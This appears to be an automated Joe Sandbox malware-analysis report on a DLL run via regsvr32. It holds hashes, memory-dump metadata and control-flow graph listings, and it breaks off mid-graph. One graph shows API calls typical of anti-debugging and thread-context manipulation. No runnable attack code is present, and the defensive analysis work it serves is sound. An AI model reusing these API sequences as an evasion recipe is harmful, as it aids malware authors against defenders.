                                                                              • Opcode Fuzzy Hash: e64884f427bebdb6745d6532d253e7e2c87e6a1ed95c8e7f63ce1c3bb79c8093
                                                                              • Instruction Fuzzy Hash: 96611592F0C65245FB65866184B43BA27E86B07BD8F044139DF4D97BCDCE3DE845AB20
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $/i:S$SYNC
                                                                              • API String ID: 0-2968757536
                                                                              • Opcode ID: 6d9780c7c443a032da55d84583ee6c2b60b91ec6d5bbca3c50946c1976a76f11
                                                                              • Instruction ID: 421ef34fdad95b030717c913eb34bc2b47156bca157b72f4556fa574d9108474
                                                                              • Opcode Fuzzy Hash: 6d9780c7c443a032da55d84583ee6c2b60b91ec6d5bbca3c50946c1976a76f11
                                                                              • Instruction Fuzzy Hash: D0025932B0CAC690EA759B15F4907EBA360FB86B84F444126DF8C87A89DF7DD185DB40
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $/i:S$SYNC
                                                                              • API String ID: 0-2968757536
                                                                              • Opcode ID: c746f4be362a77f9fc67f5068aa556fc09bef7a2b3fffd3054f3dd5c4daee66a
                                                                              • Instruction ID: a0ccf34dafec2ed17391d1e95c7926c5b81bc8b7aaa70af00f5b137368b2274d
                                                                              • Opcode Fuzzy Hash: c746f4be362a77f9fc67f5068aa556fc09bef7a2b3fffd3054f3dd5c4daee66a
                                                                              • Instruction Fuzzy Hash: BF025932B0CAC690EA759B15F4907EBA360FB86B84F444126DB8C87A89DF7DD185DB40
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $/i:S$SYNC
                                                                              • API String ID: 0-2968757536
                                                                              • Opcode ID: 7a72410df9da9a7089c9d572e05d1a4109c1312c41cbc173bf6b8ab67d2b254e
                                                                              • Instruction ID: d2874a0f5f2db1fe4fc2746e025f6bfd9c6b2953e5db7e3e77d4bcc8fe2d9d91
                                                                              • Opcode Fuzzy Hash: 7a72410df9da9a7089c9d572e05d1a4109c1312c41cbc173bf6b8ab67d2b254e
                                                                              • Instruction Fuzzy Hash: 76026B3270CAC690EA759B15F4907EBA360FB86B84F444126DF8C87A89DF7DD185DB40
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $/i:S$SYNC
                                                                              • API String ID: 0-2968757536
                                                                              • Opcode ID: 1a22cdd41c4435c0922e20372dc6ebb06f449dd7f04de9c3685a4b7a55fe74f8
                                                                              • Instruction ID: 86b711a56954de47a1b2250963d1b28a39d2f189b8891af6204f27304c20f241
                                                                              • Opcode Fuzzy Hash: 1a22cdd41c4435c0922e20372dc6ebb06f449dd7f04de9c3685a4b7a55fe74f8
                                                                              • Instruction Fuzzy Hash: B3025932B0CAC690EA759B15F4907EBA360FB86B84F444126DF8C87A89DF7DD185DB40
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $/i:S$SYNC
                                                                              • API String ID: 0-2968757536
                                                                              • Opcode ID: ee874683aef2c1240f85a84e88de2ebd7c8b9b8b5d14169c8f2e6763fdb8a4cc
                                                                              • Instruction ID: 94923a4043559effd41c17893907330a43ae510be0a763ba5a9fc0645c5564bb
                                                                              • Opcode Fuzzy Hash: ee874683aef2c1240f85a84e88de2ebd7c8b9b8b5d14169c8f2e6763fdb8a4cc
                                                                              • Instruction Fuzzy Hash: 5D026A32B0CAC690EA759B15F4907EBA360FB86B84F444126DF8C87A89DF7DD185DB40

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandle$CreateErrorEventLast
                                                                              • String ID:
                                                                              • API String ID: 3743700123-0
                                                                              • Opcode ID: 3523ead0fb1eeef65b5e01312bb2815987b47a6b11994a640fbe8d21b747275b
                                                                              • Instruction ID: e52d8beacd9eb3b691dc698b619ef84cf88cfbdc47947d13d783e7b995ba65cd
                                                                              • Opcode Fuzzy Hash: 3523ead0fb1eeef65b5e01312bb2815987b47a6b11994a640fbe8d21b747275b
                                                                              • Instruction Fuzzy Hash: C211D622B0474156F7599B12A6A03792690EB8AB90F184138DF8C47BC6EF3CA4E2A310

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 4464 7ffd348f67b0-7ffd348f6832 4466 7ffd348f6838-7ffd348f6845 TlsGetValue 4464->4466 4467 7ffd348f6a75-7ffd348f6a87 call 7ffd3494aea0 TlsGetValue 4464->4467 4469 7ffd348f684b 4466->4469 4470 7ffd348f6a6a-7ffd348f6a74 4466->4470 4467->4469 4474 7ffd348f6a8d 4467->4474 4472 7ffd348f6a68 4469->4472 4473 7ffd348f6851-7ffd348f6854 4469->4473 4472->4470 4475 7ffd348f6869-7ffd348f688c call 7ffd348f9ce0 4473->4475 4476 7ffd348f6856-7ffd348f6863 4473->4476 4474->4470 4479 7ffd348f6891-7ffd348f6894 4475->4479 4476->4475 4477 7ffd348f69e2-7ffd348f6a07 call 7ffd348efe80 4476->4477 4485 7ffd348f6a8f-7ffd348f6a9e call 7ffd3496f6b0 4477->4485 4486 7ffd348f6a0d-7ffd348f6a30 TlsGetValue TlsSetValue 4477->4486 4481 7ffd348f689a-7ffd348f6910 call 7ffd348f9610 call 7ffd348efe80 4479->4481 4482 7ffd348f6aa0-7ffd348f6b01 call 7ffd3497c2d0 4479->4482 4493 7ffd348f6b08-7ffd348f6b2a call 7ffd3496f6b0 4481->4493 4504 7ffd348f6916-7ffd348f69d7 4481->4504 4492 7ffd348f6b06 4482->4492 4485->4492 4490 7ffd348f6a63-7ffd348f6a66 4486->4490 4491 7ffd348f6a32-7ffd348f6a38 4486->4491 4490->4470 4496 7ffd348f6a3a-7ffd348f6a3e 4491->4496 4497 7ffd348f6a50-7ffd348f6a5e call 7ffd348efe90 4491->4497 4492->4493 4505 7ffd348f6b2c 4493->4505 4506 7ffd348f6b31-7ffd348f6b38 4493->4506 4496->4497 4501 7ffd348f6a40-7ffd348f6a4b call 7ffd348efe90 4496->4501 4497->4490 4501->4497 4504->4477 4505->4506 4507 7ffd348f6b3a-7ffd348f6b41 call 7ffd348efe90 4506->4507 4508 7ffd348f6b46-7ffd348f6b55 call 7ffd34993140 4506->4508 4507->4508 4512 7ffd348f6b57-7ffd348f6b5e call 7ffd348efe90 4508->4512 4513 7ffd348f6b63-7ffd348f6b8a call 7ffd3497c5e0 call 7ffd348f6250 call 7ffd34993140 4508->4513 4512->4513 4521 7ffd348f6b8c-7ffd348f6b91 4513->4521 4522 7ffd348f6ba7-7ffd348f6be6 call 7ffd348f9ce0 4513->4522 4521->4522 4523 7ffd348f6b93-7ffd348f6b9d 4521->4523 4527 7ffd348f6be8-7ffd348f6bf4 4522->4527 4528 7ffd348f6c12-7ffd348f6c66 call 7ffd348f9610 4522->4528 4523->4522 4530 7ffd348f6bfb-7ffd348f6c02 4527->4530 4531 7ffd348f6bf6 4527->4531 4532 7ffd348f6c6a-7ffd348f6c9e call 7ffd348f6dc0 4528->4532 4530->4532 4533 7ffd348f6c04-7ffd348f6c10 call 7ffd348efe90 4530->4533 4531->4530 4533->4532
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Value
                                                                              • String ID:
                                                                              • API String ID: 3702945584-0
                                                                              • Opcode ID: b8fea45ead18cdd206ebf83bef4c4e570bd5c96a6b59aeef6ae735ea17c2f39c
                                                                              • Instruction ID: efb3dec8e4b4ffed2b7efc011dbb0c9c1576d5517f589e5e374e0e0844330df0
                                                                              • Opcode Fuzzy Hash: b8fea45ead18cdd206ebf83bef4c4e570bd5c96a6b59aeef6ae735ea17c2f39c
                                                                              • Instruction Fuzzy Hash: 9DA1D422B18AC181FA558B18E0913F9A3A0FF86784F149234EB8C577A5EF3DE5D29340

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 4547 7ffd348fdac0-7ffd348fdafb call 7ffd3493fe90 CloseHandle * 2
                                                                              APIs
                                                                                • Part of subcall function 00007FFD3493FE90: GetOverlappedResult.KERNEL32(00000000,?,00000000,?,00007FFD348FDAD4,?,00000000,?,00007FFD3493FB7A), ref: 00007FFD3493FED1
                                                                              • CloseHandle.KERNEL32(?,00000000,?,00007FFD3493FB7A), ref: 00007FFD348FDAD8
                                                                              • CloseHandle.KERNEL32(?,00000000,?,00007FFD3493FB7A), ref: 00007FFD348FDAE1
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandle$OverlappedResult
                                                                              • String ID:
                                                                              • API String ID: 953004297-0
                                                                              • Opcode ID: 664788fec045c97cfa4a43f446a0bf17c13a88a4f8b435e264a1485e7add3fa3
                                                                              • Instruction ID: 5c6db2ab9955b2291913cd632decce6bdc12fb139acf9e4e2a1e235696c09f83
                                                                              • Opcode Fuzzy Hash: 664788fec045c97cfa4a43f446a0bf17c13a88a4f8b435e264a1485e7add3fa3
                                                                              • Instruction Fuzzy Hash: F7E08603B0460587F630A662F4A11BA6320AB8A790F044035EF8D8BB968D2CE4C2A720

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 5085 7ffd348ea040-7ffd348ea085 memset 5086 7ffd348ea08b-7ffd348ea0c5 call 7ffd348e7180 5085->5086 5087 7ffd348ea271-7ffd348ea278 5085->5087 5096 7ffd348ea0c7-7ffd348ea0ca 5086->5096 5097 7ffd348ea0e0-7ffd348ea0f0 call 7ffd349824c0 5086->5097 5088 7ffd348ea491-7ffd348ea503 AddVectoredExceptionHandler NtQueryInformationProcess call 7ffd348efe80 5087->5088 5089 7ffd348ea27e-7ffd348ea2b8 call 7ffd348e7180 5087->5089 5099 7ffd348ea509-7ffd348ea530 NtQuerySystemInformation 5088->5099 5100 7ffd348ea93a-7ffd348ea944 call 7ffd3496f690 5088->5100 5101 7ffd348ea2ba-7ffd348ea2bd 5089->5101 5102 7ffd348ea2e0-7ffd348ea2f0 call 7ffd349824c0 5089->5102 5103 7ffd348ea0cc-7ffd348ea0ce 5096->5103 5104 7ffd348ea10d-7ffd348ea137 call 7ffd349703a0 GetModuleHandleA 5096->5104 5097->5104 5114 7ffd348ea0f2-7ffd348ea0f8 5097->5114 5106 7ffd348ea887-7ffd348ea8bb call 7ffd348efe90 5099->5106 5107 7ffd348ea536-7ffd348ea560 5099->5107 5119 7ffd348ea949-7ffd348ea981 call 7ffd3497c8b0 5100->5119 5109 7ffd348ea33c-7ffd348ea358 call 7ffd349703a0 5101->5109 5110 7ffd348ea2bf-7ffd348ea2c1 5101->5110 5102->5109 5130 7ffd348ea2f2-7ffd348ea2f8 5102->5130 5113 7ffd348ea0d0-7ffd348ea0d4 5103->5113 5127 7ffd348ea139-7ffd348ea144 LoadLibraryA 5104->5127 5128 7ffd348ea14a-7ffd348ea187 call 7ffd348e7180 5104->5128 5135 7ffd348ea8f6-7ffd348ea914 5106->5135 5107->5106 5115 7ffd348ea566-7ffd348ea5bf 5107->5115 5133 7ffd348ea35b-7ffd348ea3a0 GetModuleHandleA call 7ffd348e7180 5109->5133 5118 7ffd348ea2d0-7ffd348ea2d4 5110->5118 5113->5114 5121 7ffd348ea0d6-7ffd348ea0dc 5113->5121 5114->5119 5124 7ffd348ea0fe-7ffd348ea109 GetModuleHandleA 5114->5124 5125 7ffd348ea5c0-7ffd348ea5cd 5115->5125 5129 7ffd348ea2d6-7ffd348ea2dc 5118->5129 5118->5130 5142 7ffd348ea986-7ffd348ea99b 5119->5142 5121->5113 5132 7ffd348ea0de 5121->5132 5124->5128 5136 7ffd348ea10b 5124->5136 5137 7ffd348ea600-7ffd348ea60c 5125->5137 5138 7ffd348ea5ce 5125->5138 5127->5128 5139 7ffd348ea915-7ffd348ea932 5127->5139 5157 7ffd348ea189-7ffd348ea18c 5128->5157 5158 7ffd348ea1a1-7ffd348ea1b1 call 7ffd349824c0 5128->5158 5129->5118 5141 7ffd348ea2de 5129->5141 5130->5133 5134 7ffd348ea2fa-7ffd348ea337 call 7ffd3497c8b0 5130->5134 5132->5104 5165 7ffd348ea3c1-7ffd348ea3d1 call 7ffd349824c0 5133->5165 5166 7ffd348ea3a2-7ffd348ea3a5 5133->5166 5134->5142 5136->5127 5145 7ffd348ea5cf-7ffd348ea5da 5137->5145 5148 7ffd348ea60e-7ffd348ea61a 5137->5148 5138->5145 5146 7ffd348ea85a-7ffd348ea866 5139->5146 5147 7ffd348ea938 5139->5147 5141->5109 5159 7ffd348ea9ff-7ffd348eaa05 5142->5159 5160 7ffd348ea99d-7ffd348ea9ad call 7ffd348efe90 5142->5160 5153 7ffd348ea6a7-7ffd348ea6b4 5145->5153 5154 7ffd348ea5e0-7ffd348ea5eb 5145->5154 5155 7ffd348ea8f1 call 7ffd348efe90 5146->5155 5147->5135 5156 7ffd348ea63a-7ffd348ea682 NtOpenThread 5148->5156 5162 7ffd348ea86b-7ffd348ea86e 5153->5162 5163 7ffd348ea6ba-7ffd348ea6ec call 7ffd348efe90 5153->5163 5154->5125 5167 7ffd348ea5ed 5154->5167 5155->5135 5172 7ffd348ea684-7ffd348ea696 5156->5172 5173 7ffd348ea631-7ffd348ea638 5156->5173 5168 7ffd348ea1fd-7ffd348ea219 call 7ffd349703a0 5157->5168 5169 7ffd348ea18e 5157->5169 5158->5168 5193 7ffd348ea1b3-7ffd348ea1b9 5158->5193 5170 7ffd348eaa4b-7ffd348eaa5e call 7ffd34993140 5159->5170 5171 7ffd348eaa07-7ffd348eaa46 call 7ffd348efe90 5159->5171 5160->5159 5162->5106 5186 7ffd348ea870-7ffd348ea882 call 7ffd348efe90 5162->5186 5201 7ffd348ea6f0-7ffd348ea6f6 5163->5201 5184 7ffd348ea41d-7ffd348ea439 call 7ffd349703a0 5165->5184 5199 7ffd348ea3d3-7ffd348ea3d9 5165->5199 5183 7ffd348ea3a7-7ffd348ea3a9 5166->5183 5166->5184 5167->5153 5205 7ffd348ea21c-7ffd348ea22a GetProcAddress 5168->5205 5178 7ffd348ea190-7ffd348ea195 5169->5178 5171->5170 5175 7ffd348ea698-7ffd348ea6a2 call 7ffd348e66a0 5172->5175 5176 7ffd348ea620-7ffd348ea62c 5172->5176 5173->5145 5173->5156 5175->5176 5176->5173 5192 7ffd348ea197-7ffd348ea19d 5178->5192 5178->5193 5196 7ffd348ea3b0-7ffd348ea3b5 5183->5196 5208 7ffd348ea43c-7ffd348ea44a GetProcAddress 5184->5208 5186->5106 5192->5178 5203 7ffd348ea19f 5192->5203 5204 7ffd348ea1bb-7ffd348ea1f8 call 7ffd3497c8b0 5193->5204 5193->5205 5196->5199 5206 7ffd348ea3b7-7ffd348ea3bd 5196->5206 5207 7ffd348ea3db-7ffd348ea418 call 7ffd3497c8b0 5199->5207 5199->5208 5209 7ffd348ea6fc-7ffd348ea70c NtGetContextThread 5201->5209 5210 7ffd348ea7b0-7ffd348ea7d4 5201->5210 5203->5168 5204->5142 5212 7ffd348ea7df-7ffd348ea7fd 5205->5212 5213 7ffd348ea230-7ffd348ea245 5205->5213 5206->5196 5214 7ffd348ea3bf 5206->5214 5207->5142 5216 7ffd348ea450-7ffd348ea465 5208->5216 5217 7ffd348ea81d-7ffd348ea83b 5208->5217 5218 7ffd348ea712-7ffd348ea719 5209->5218 5219 7ffd348ea8bd-7ffd348ea8df 5209->5219 5220 7ffd348ea7da 5210->5220 5221 7ffd348ea8e1-7ffd348ea8ee 5210->5221 5222 7ffd348ea7ff-7ffd348ea816 call 7ffd348efe90 5212->5222 5223 7ffd348ea84e-7ffd348ea854 5212->5223 5225 7ffd348ea247-7ffd348ea253 call 7ffd348efe90 5213->5225 5226 7ffd348ea258-7ffd348ea25e 5213->5226 5214->5184 5229 7ffd348ea467-7ffd348ea473 call 7ffd348efe90 5216->5229 5230 7ffd348ea478-7ffd348ea47e 5216->5230 5217->5223 5234 7ffd348ea83d-7ffd348ea849 call 7ffd348efe90 5217->5234 5231 7ffd348ea71b-7ffd348ea741 5218->5231 5232 7ffd348ea74d-7ffd348ea754 5218->5232 5219->5135 5219->5221 5220->5135 5221->5155 5222->5146 5245 7ffd348ea818 5222->5245 5223->5135 5223->5146 5225->5226 5226->5087 5227 7ffd348ea260-7ffd348ea26c call 7ffd348efe90 5226->5227 5227->5087 5229->5230 5230->5088 5240 7ffd348ea480-7ffd348ea48c call 7ffd348efe90 5230->5240 5231->5232 5238 7ffd348ea788-7ffd348ea795 NtSetContextThread 5232->5238 5239 7ffd348ea756-7ffd348ea77c 5232->5239 5234->5223 5238->5219 5243 7ffd348ea79b-7ffd348ea7aa NtClose 5238->5243 5239->5238 5240->5088 5243->5201 5243->5210 5245->5135
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: HandleModule$AddressContextInformationProcQueryThread$ExceptionHandlerLibraryLoadProcessSystemVectoredmemset
                                                                              • String ID: called `Result::unwrap()` on an `Err` value/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\collections\btree\navigate.rs
                                                                              • API String ID: 2177257871-362855569
                                                                              • Opcode ID: 02edd65b9ca3a91810b8c05ee153fc30b39838edde7d003dfe31fc50903a214a
                                                                              • Instruction ID: 82c2aaf76fa6323d29e32a39401375ca7cd0c631679371d8d79ac7c9b48b4c6c
                                                                              • Opcode Fuzzy Hash: 02edd65b9ca3a91810b8c05ee153fc30b39838edde7d003dfe31fc50903a214a
                                                                              • Instruction Fuzzy Hash: A3426332B0C78281F6659B11A4A03BB67A0FF86B84F484135DF8D87B99DF7DE485A710

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 5553 7ffd348e7f00-7ffd348e7f1d call 7ffd34992a4c 5556 7ffd348e83f4-7ffd348e8408 5553->5556 5557 7ffd348e7f23-7ffd348e7f38 call 7ffd349929fc 5553->5557 5557->5556 5560 7ffd348e7f3e-7ffd348e7f48 GetModuleHandleA 5557->5560 5560->5556 5561 7ffd348e7f4e-7ffd348e7f55 5560->5561 5561->5556 5562 7ffd348e7f5b-7ffd348e7ff7 call 7ffd348f65a0 call 7ffd348e8610 call 7ffd348e7180 call 7ffd34992bf4 call 7ffd348e7180 GetProcAddress 5561->5562 5573 7ffd348e7ff9-7ffd348e8002 call 7ffd348efe90 5562->5573 5574 7ffd348e8007-7ffd348e800f 5562->5574 5573->5574 5576 7ffd348e8011-7ffd348e801a call 7ffd348efe90 5574->5576 5577 7ffd348e801f-7ffd348e809a call 7ffd348e7180 GetModuleHandleA call 7ffd348e7180 GetProcAddress 5574->5577 5576->5577 5583 7ffd348e809c-7ffd348e80a5 call 7ffd348efe90 5577->5583 5584 7ffd348e80aa-7ffd348e80b2 5577->5584 5583->5584 5586 7ffd348e80b4-7ffd348e80bd call 7ffd348efe90 5584->5586 5587 7ffd348e80c2-7ffd348e813b call 7ffd348e7180 LoadLibraryA call 7ffd348e7180 GetProcAddress 5584->5587 5586->5587 5593 7ffd348e814b-7ffd348e8153 5587->5593 5594 7ffd348e813d-7ffd348e8146 call 7ffd348efe90 5587->5594 5596 7ffd348e8155-7ffd348e815e call 7ffd348efe90 5593->5596 5597 7ffd348e8163-7ffd348e81dc call 7ffd348e7180 LoadLibraryA call 7ffd348e7180 GetProcAddress 5593->5597 5594->5593 5596->5597 5603 7ffd348e81ec-7ffd348e81f4 5597->5603 5604 7ffd348e81de-7ffd348e81e7 call 7ffd348efe90 5597->5604 5606 7ffd348e81f6-7ffd348e81ff call 7ffd348efe90 5603->5606 5607 7ffd348e8204-7ffd348e827d call 7ffd348e7180 LoadLibraryA call 7ffd348e7180 GetProcAddress 5603->5607 5604->5603 5606->5607 5613 7ffd348e827f-7ffd348e8288 call 7ffd348efe90 5607->5613 5614 7ffd348e828d-7ffd348e8295 